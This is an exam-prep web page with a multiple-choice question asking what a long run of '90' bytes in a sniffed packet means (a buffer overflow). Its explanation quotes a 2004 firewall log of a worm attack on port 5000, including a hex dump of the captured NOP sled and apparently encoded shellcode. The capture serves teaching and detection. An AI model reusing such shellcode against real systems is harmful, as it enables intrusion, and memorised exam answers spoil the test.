You are running a packet sniffer on a network and see a packet with a long string of long string of…

seenagapeNovember 1, 2015

You are running a packet sniffer on a network and see a packet with a long string of long string of
“90 90 90 90….” in the middle of it traveling to an x86-based machine. This could be indicative of
what?

PrepAway - Latest Free Exam Questions & Answers

A.
Over-subscription of the traffic on a backbone

B.
A source quench packet

C.
a FIN scan

D.
A buffer overflow

Explanation:
“TCP
Port 5000 Buffer
Overflow Attack
The attack on Port
5000 was part of this scan pattern Mar 14, 2004 15:58:17.837 – (TCP) 68.144.13.102 : 2282 >>>
192.168.1.36 : 2745 Mar 14, 2004 15:58:17.857 – (TCP) 68.144.13.102 : 2283 >>> 68.144.193.246 :
135 Mar 14, 2004 15:58:17.887 – (TCP) 68.144.13.102 : 2284 >>> 192.168.1.38 : 1025 Mar 14, 2004
15:58:17.907 – (TCP) 68.144.13.102 : 2285 >>> 68.144.193.246 : 445 Mar 14, 2004 15:58:17.938 –
(TCP) 68.144.13.102 : 2286 >>> 192.168.1.36 : 3127 Mar 14, 2004 15:58:17.958 – (TCP)
68.144.13.102 : 2287 >>> 68.144.193.246 : 6129 Mar 14, 2004 15:58:17.988 – (TCP) 68.144.13.102 :
2288 >>> 68.144.193.246 : 139 Mar 14, 2004 15:58:18.008 – (TCP) 68.144.13.102 : 2289 >>>
192.168.1.36 : 5000 Mar 14, 2004 15:58:29.164 – (TCP) 68.144.13.102 : 1442 >>> 68.144.193.246 :
1981 Mar 14, 2004 15:58:33.470 – (TCP) 68.144.13.102 : 1442 >>> 68.144.193.246 : 1981 Mar 14,
2004 15:58:39.288 – (TCP) 68.144.13.102 : 1442 >>> 68.144.193.246 : 1981 The attack appears to be
a buffer overfull attack on the Plug and Play service on TCP Port 5000, which likely contains
instructions to download and execute the rest of the worm. TCP Connection Request —- 14/03/2004
15:40:57.910 68.144.193.124 : 4560 TCP Connected ID = 1 —- 14/03/2004 15:40:57.910 Status Code:
0 OK 68.144.193.124 : 4560 TCP Data In Length 697 bytes MD5 =
19323C2EA6F5FCEE2382690100455C17 —- 14/03/2004 15:40:57.920 0000 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 ……………. 0010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0020 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………. 0030 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 ……………. 0040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………. 0050
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………. 0060 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 ……………. 0070 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………. 0080 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………. 0090 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 ……………. 00A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………. 00B0 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 ……………. 00C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
……………. 00D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………. 00E0 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 ……………. 00F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
……………. 0100 90 90 90 90 90 90 90 90 90 90 90 90 4D 3F E3 77 …………M?.w 0110 90 90 90 90 FF
63 64 90 90 90 90 90 90 90 90 90 …..cd……… 0120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
……………. 0130 90 90 90 90 90 90 90 90 EB 10 5A 4A 33 C9 66 B9 ……….ZJ3.f. 0140 66 01 80 34 0A 99
E2 FA EB 05 E8 EB FF FF FF 70 f..4………..p 0150 99 98 99 99 C3 21 95 69 64 E6 12 99 12 E9 85 34
…..!.id……4 0160 12 D9 91 12 41 12 EA A5 9A 6A 12 EF E1 9A 6A 12 ….A….j….j. 0170 E7 B9 9A 62 12
D7 8D AA 74 CF CE C8 12 A6 9A 62 …b….t……b 0180 12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A 5E 9D DC
7B .k…j?…..^..{ 0190 70 C0 C6 C7 12 54 12 DF BD 9A 5A 48 78 9A 58 AA p….T….ZHx.X. 01A0 50 FF 12
91 12 DF 85 9A 5A 58 78 9B 9A 58 12 99 P…….ZXx..X.. 01B0 9A 5A 12 63 12 6E 1A 5F 97 12 49 F3 9A
C0 71 E5 .Z.c.n._..I…q. 01C0 99 99 99 1A 5F 94 CB CF 66 CE 65 C3 12 41 F3 9D …._…f.e..A.. 01D0 C0
71 F0 99 99 99 C9 C9 C9 C9 F3 98 F3 9B 66 CE .q…………f. 01E0 69 12 41 5E 9E 9B 99 9E 24 AA 59 10
DE 9D F3 89 i.A^….$.Y….. 01F0 CE CA 66 CE 6D F3 98 CA 66 CE 61 C9 C9 CA 66 CE ..f.m…f.a…f. 0200
65 1A 75 DD 12 6D AA 42 F3 89 C0 10 85 17 7B 62 e.u..m.B……{b 0210 10 DF A1 10 DF A5 10 DF D9
5E DF B5 98 98 99 99 ………^…… 0220 14 DE 89 C9 CF CA CA CA F3 98 CA CA 5E DE A5 FA …………^…
0230 F4 FD 99 14 DE A5 C9 CA 66 CE 7D C9 66 CE 71 AA ……..f.}.f.q. 0240 59 35 1C 59 EC 60 C8 CB CF
CA 66 4B C3 C0 32 7B Y5.Y.`….fK..2{ 0250 77 AA 59 5A 71 62 67 66 66 DE FC ED C9 EB F6 FA
w.YZqbgff……. 0260 D8 FD FD EB FC EA EA 99 DA EB FC F8 ED FC C9 EB ……………. 0270 F6 FA FC EA
EA D8 99 DC E1 F0 ED C9 EB F6 FA FC ……………. 0280 EA EA 99 D5 F6 F8 FD D5 F0 FB EB F8 EB E0 D8
99 ……………. 0290 EE EA AB C6 AA AB 99 CE CA D8 CA F6 FA F2 FC ED ……………. 02A0 D8 99 FB F0 F7
FD 99 F5 F0 EA ED FC F7 99 F8 FA ……………. 02B0 FA FC E9 ED 99 0D 0A 0D 0A ……… “
http://www.linklogger.com/TCP5000_Overflow.htm

Get 50% Discount on All Your Purchases
at PrepAway.com - Latest Exam Questions

This is ONE TIME OFFER

Enter your email address to receive your 50% off dicount code:

SPECIAL OFFER: GET 50% OFF

Use Discount Code:

ISC Exam Questions

Free ISC2 Study Guide

You are running a packet sniffer on a network and see a packet with a long string of long string of…

Leave a Reply Cancel reply